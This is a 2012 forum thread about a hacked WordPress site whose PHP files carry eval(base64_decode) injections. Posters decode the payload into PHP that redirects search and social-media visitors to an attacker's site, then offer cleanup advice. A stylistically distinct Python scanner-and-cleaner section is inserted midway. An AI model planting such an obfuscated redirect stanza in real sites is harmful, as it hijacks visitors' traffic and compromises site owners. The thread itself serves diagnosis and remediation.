
Somethings gone terribly wrong, what do I do?

    # February 16, 2012 at 2:06 pm

    Heey,

    So I have no idea what has happened, but I just logged in to my server via Coda to make some changes to a WordPress theme and basically it looks like all the PHP files have changed; they all are like this:

    <?php eval(base64_decode("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")); get_header(); ?>

    <?php eval(base64_decode("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")); if (have_posts()) : while (have_posts()) : the_post(); ?>

    That’s just a small amount from the single.php page. I’m guessing it has something to do with the encoding perhaps? I’ve had a look at the files through the WordPress admin and they are all the same. I did log into another FTP yesterday; could that have something to do with it, perhaps it changed the default encoding Coda used?

    The website is working fine at the moment, thankfully, but I’m really worried about it. What will happen when I need to make changes? Can I change it back somehow?

    Any help is really, really appreciated…

    Thanks!

    Ash

    # February 16, 2012 at 2:16 pm

    Looks like you have been subject to an exploit

    try

    http://wordpress.org/extend/plugins/exploit-scanner/

    # February 16, 2012 at 2:50 pm

    This is why it is always good practice to keep recent back-ups of your WordPress websites if at all possible.

    # February 16, 2012 at 2:59 pm

    Yup, What that “base64_decode” means is that the javascript was encoded into base64. It’s very easy to decode. Create the file here on your desktop and you can paste in the code and have it decoded for you.

    Here is an example of the first line:

    DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9

    which equals:

    error_reporting(0);
    $qazplm=headers_sent();
    if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
    if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
    if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
    header("Location: LINK REMOVED");
    exit();
    }
    }
    }
    }

    Basically it’s some code to redirect your traffic to their page I believe. Probably to farm ad revenue. The other lines are also basically the same thing.

    I would change all your passwords and google around for other ways to make your website more secure.

    # February 16, 2012 at 3:18 pm

    In “Digging Into WordPress” by Chris Coyier, he goes over some tactics to make it a little more difficult for hackers to break into your website. Also, it’s a very good read for WordPress entrepreneurs.

    # February 16, 2012 at 7:41 pm

    Ah! Thanks for the help everyone, have managed to back up most of the folders so will keep on going, and will definitely check out the Digging Into WordPress book…

    Gonna have to change every password now aren’t I?

    Ash

    # February 16, 2012 at 9:00 pm

    Ok, don’t know if this is something to worry about or not, but this file is in my root folder and I’m not sure if it’s supposed to be or not. It’s called “php.ini” and it’s got the following in it:

    register_globals = off
    allow_url_fopen = off

    expose_php = Off
    max_input_time = 60
    variables_order = "EGPCS"
    extension_dir = ./
    upload_tmp_dir = /tmp
    precision = 12
    SMTP = relay-hosting.secureserver.net
    url_rewriter.tags = "a=href,area=href,frame=src,input=src,form=,fieldset="


    ; Only uncomment zend optimizer lines if your application requires Zend Optimizer support

    ;[Zend]
    ;zend_optimizer.optimization_level=15
    ;zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-3.3.3
    ;zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-3.3.3
    ;zend_extension=/usr/local/Zend/lib/Optimizer-3.3.3/ZendExtensionManager.so
    ;zend_extension_ts=/usr/local/Zend/lib/Optimizer_TS-3.3.3/ZendExtensionManager_TS.so


    ; -- Be very careful to not to disable a function which might be needed!
    ; -- Uncomment the following lines to increase the security of your PHP site.

    ;disable_functions = "highlight_file,ini_alter,ini_restore,openlog,passthru,
    ; phpinfo, exec, system, dl, fsockopen, set_time_limit,
    ; popen, proc_open, proc_nice,shell_exec,show_source,symlink"

    Is that part of the hack or something to do with my host/wordpress?

    Thanks again, this is a nightmare, eh!

    # February 17, 2012 at 12:10 am

    yeah, that should be there

    # March 5, 2012 at 5:37 pm

    Same situation happened with a client; he owns 30 sites on one cPanel and all the PHP files got infected with this base64 code, and when I decoded it I found that it’s just an exploit to get traffic to a few sites…
    The only way is to download all the files, clean them of this code and upload them again. Why these files got infected is just a mystery. Still figuring it out. Also read a good discussion board for this problem: http://redleg-redleg.blogspot.com/2012/02/costabrava-bee-pl.html?showComment=1330986257272#c6640785865930412418

    Searching for the security issue next, to avoid such a problem again. And if anybody has found a solution then please advise.

    Regards

    # March 5, 2012 at 5:39 pm

    Actual base64 code is this

    eval(base64_decode("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"));
    define( "WP_INSTALLING", true );

    and after decoding I found this:

    error_reporting(0);
    $qazplm=headers_sent();
    if (!$qazplm)
    {
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag)
    {
    if (stristr($referer,"yahoo") or
    stristr($referer,"bing") or
    stristr($referer,"rambler") or
    stristr($referer,"gogo") or
    stristr($referer,"live.com") or
    stristr($referer,"aport") or
    stristr($referer,"nigma") or
    stristr($referer,"webalta") or
    stristr($referer,"begun.ru") or
    stristr($referer,"stumbleupon.com") or
    stristr($referer,"bit.ly") or
    stristr($referer,"tinyurl.com") or
    preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or
    preg_match ("/google\.(.*?)\/url/",$referer) or
    stristr($referer,"myspace.com") or
    stristr($referer,"facebook.com") or
    stristr($referer,"aol.com"))
    {
    if (!stristr($referer,"cache") or
    !stristr($referer,"inurl"))
    {
    header("Location: http://froling(dot)bee(dot)pl/"); exit();
    }
    }
    }
    }

    Note: I changed the URL of the header location in the code so nobody can click it accidentally. Thanks Karlpcrowley for pointing this issue out to me.
    Cleaning files one by one is really tedious work …

    # March 5, 2012 at 5:52 pm

    Hey @Kamran9868 and @noahgelman,
    Any chance you edit that post to remove or modify the link in the header at the bottom
    Don’t want anybody to accidentally click it :)

    # March 5, 2012 at 10:18 pm

    yeah sure … I just changed the URL … Well, I’d been googling and I found this article very useful for finding malicious code on a hacked server… it’s a script, lookforbadguys, which can help find infected files and code bugs.
    I hope this may help.
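A small finder-and-cleaner for the eval(base64_decode(...)) stanza seen in this thread, added here as an illustration; it is not the lookforbadguys script, Sucuri’s tooling, or any poster’s code, and the infected sample, its payload and the attacker.invalid host are constructed for the example. It decodes each stanza, flags the redirect markers the decoded code above contains, and strips the stanza from the file so the original `<?php get_header(); ?>` line is left behind.

```python
import base64
import re
from pathlib import Path

# Matches the injected stanza seen in this thread: eval(base64_decode("<payload>"));
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;?'
)

# Strings in the decoded payload that mark it as the conditional-redirect injection.
INDICATORS = ('header("Location:', "$_SERVER['HTTP_REFERER']", "error_reporting(0)")


def scan_source(src: str) -> list[dict]:
    """Return one finding per eval(base64_decode(...)) stanza in a PHP source string."""
    findings = []
    for m in EVAL_B64.finditer(src):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64: still report the stanza, with no decode
            decoded = ""
        findings.append({
            "offset": m.start(),
            "decoded": decoded,
            "indicators": [i for i in INDICATORS if i in decoded],
        })
    return findings


def clean_source(src: str) -> str:
    """Strip every injected stanza and collapse the whitespace it leaves behind."""
    cleaned = EVAL_B64.sub("", src)
    return re.sub(r"<\?php\s+", "<?php ", cleaned)


def scan_tree(root: Path) -> dict[Path, list[dict]]:
    """Walk a directory and report every .php file that carries an injected stanza."""
    return {p: f for p in root.rglob("*.php")
            if (f := scan_source(p.read_text(errors="replace")))}


# Constructed sample: the redirect logic from the thread, re-encoded the way the injection was.
PAYLOAD_PHP = ("error_reporting(0);$referer=$_SERVER['HTTP_REFERER'];"
               'if (stristr($referer,"yahoo")) { header("Location: http://attacker.invalid/"); exit(); }')
PAYLOAD_B64 = base64.b64encode(PAYLOAD_PHP.encode()).decode()
INFECTED = f'<?php eval(base64_decode("{PAYLOAD_B64}")); get_header(); ?>\n<div class="post">'

if __name__ == "__main__":
    for hit in scan_source(INFECTED):
        print(f"stanza at offset {hit['offset']}, indicators: {hit['indicators']}")
    print(clean_source(INFECTED))
```

Run `scan_tree(Path("wp-content/themes"))` over a copy of the site to list affected files before writing anything back; a clean file on disk does not reopen the door the injection came through, so passwords and the entry point still need attention.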

    # March 5, 2012 at 10:34 pm

    Got one more good article for this here http://www.she-geeks.com/tag/malicious-eval-base64-code/ and also check http://sucuri.net/; they seem good at fixing the issue.

    # March 6, 2012 at 3:35 am

    @karlpcrowley Removed the one from Noah’s post as well
